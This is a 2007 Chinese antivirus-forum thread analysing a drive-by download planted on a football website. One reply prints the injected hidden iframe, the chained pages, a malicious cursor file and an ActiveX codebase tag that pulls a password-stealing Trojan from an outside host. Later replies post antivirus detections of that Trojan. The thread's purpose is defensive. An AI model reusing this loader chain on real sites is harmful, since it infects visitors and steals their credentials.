查看: 4181|回复: 13
收起左侧

[已鉴定] 一个足球网站被挂马拉。

 关闭 [复制链接]
zengmingwh
发表于 2007-11-1 08:21:26 | 显示全部楼层 |阅读模式
hxxp://bbs.hbfootball.com/bbs/index.asp?boardid=7
谁能分析一下,谢谢啦。
a256886572008
发表于 2007-11-1 08:28:45 | 显示全部楼层
<iframe src=http://51731006.com/admin/92.htm width=20 height=0 frameborder=0></iframe>ref="dispuser.asp?id=1618" target="_blank">舍甫琴科</a></div>

http://51731006.com/admin/92.htm的結構
<HTML>
<script language=javascript src=http://51731006.com/admin/06014.js></script>
</HTML>
<iframe src=pps.htm width=0 height=0></iframe>
<iframe src=xin.htm width=0 height=0></iframe>
<DIV style="CURSOR: url('ah.c')"></DIV>
<script src='http://s95.cnzz.com/stat.php?id=659955&web_id=659955' language='JavaScript' charset='gb2312'></script>


http://51731006.com/admin/ah.c的結構
悑Z輴��艕塂$a描�� http://51731006.com/admin/xx.exeRar!


http://51731006.com/admin/xin.htm的結構
<html>
<head>
<title>WoSign - Code Signing Test</title>

<meta http-equiv="Content-Type" c>
</head>

<body bgcolor="#FFFFFF" text="#000000">
<br>
<CENTER>
   WoSign
</CENTER>
<object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365"
codebase="http://51731006.com/admin/xx.exe#version=1,0,0,002"  width="0" height="0">

</object>


eq1.png
eq2.png
eq3.png

[ 本帖最后由 a256886572008 于 2007-11-1 08:33 编辑 ]

xx.rar

20.92 KB, 下载次数: 146

mofunzone
发表于 2007-11-1 08:55:25 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Users\morgan\Documents\xx.rar'
C:\Users\morgan\Documents\
  xx.rar
    [0] Archive type: RAR
    --> xx.exe
        [DETECTION] Is the Trojan horse TR/PSW.Delf.QO
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
The EQs
发表于 2007-11-1 09:17:14 | 显示全部楼层
C:\Documents and Settings\Don johnson\桌面\xx.rar &raquo; RAR &raquo; xx.exe - Win32/PSW.Delf.NIY trojan
BING126
头像被屏蔽
发表于 2007-11-1 09:55:59 | 显示全部楼层
KIS6报了   已检测: 木马程序 Trojan-PSW.Win32.Delf.qo        URL: hxxp://51731006.com/admin/xx.exe//UPX

[ 本帖最后由 BING126 于 2007-11-1 10:07 编辑 ]
lonjet
发表于 2007-11-1 10:04:16 | 显示全部楼层

McAfee 已自动阻止和删除 特洛伊木马程序。

McAfee 已自动阻止和删除 特洛伊木马程序。

关于此 特洛伊木马程序
已检测到: PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序), PWS-QQPass.dll (特洛伊木马程序)
位置: C:\Documents and Settings\Ede\桌面\xx\xx.exe
啊弥陀佛
发表于 2007-11-1 10:08:40 | 显示全部楼层
微点砍掉
未命名.JPG
uhthn2002
发表于 2007-11-1 10:53:03 | 显示全部楼层
Uhthn Anti-Spyware V3 Alpha
Version - 3.0.0
Standard Database - 781
Paranoia Database - 48412
Heuristics Analysis - Excessive
Scan in - C:\Documents and Settings\Uhthn\Desktop\xx.exe

C:\Documents and Settings\Uhthn\Desktop\xx.exe - Suspected WIN32.TROJAN-DOWNLOADER (HTTP://...)

1 Files scanned
0 Infected files found
1 Suspected files found
0 Files disinfected
0 Files deleted
残缺的唯美
发表于 2007-11-1 10:56:01 | 显示全部楼层
Result: 1 malware found
Trojan-PSW.Win32.Delf.qo (virus)
C:\Users\Administrator\Desktop\xx.rar\xx.exe
Guanguancan
发表于 2007-11-4 17:08:51 | 显示全部楼层
发现下列程序尝试通过傲游浏览器运行.
请确定这是您主动执行的操作.

[数字证书]
Microsoft Windows Publisher
(Microsoft Windows Verification Intermediate PCA)

[目标程序]
C:\WINDOWS\system32\cmd.exe   /c C:\WINDOWS\sys99.exe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-14 15:11 , Processed in 0.144648 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表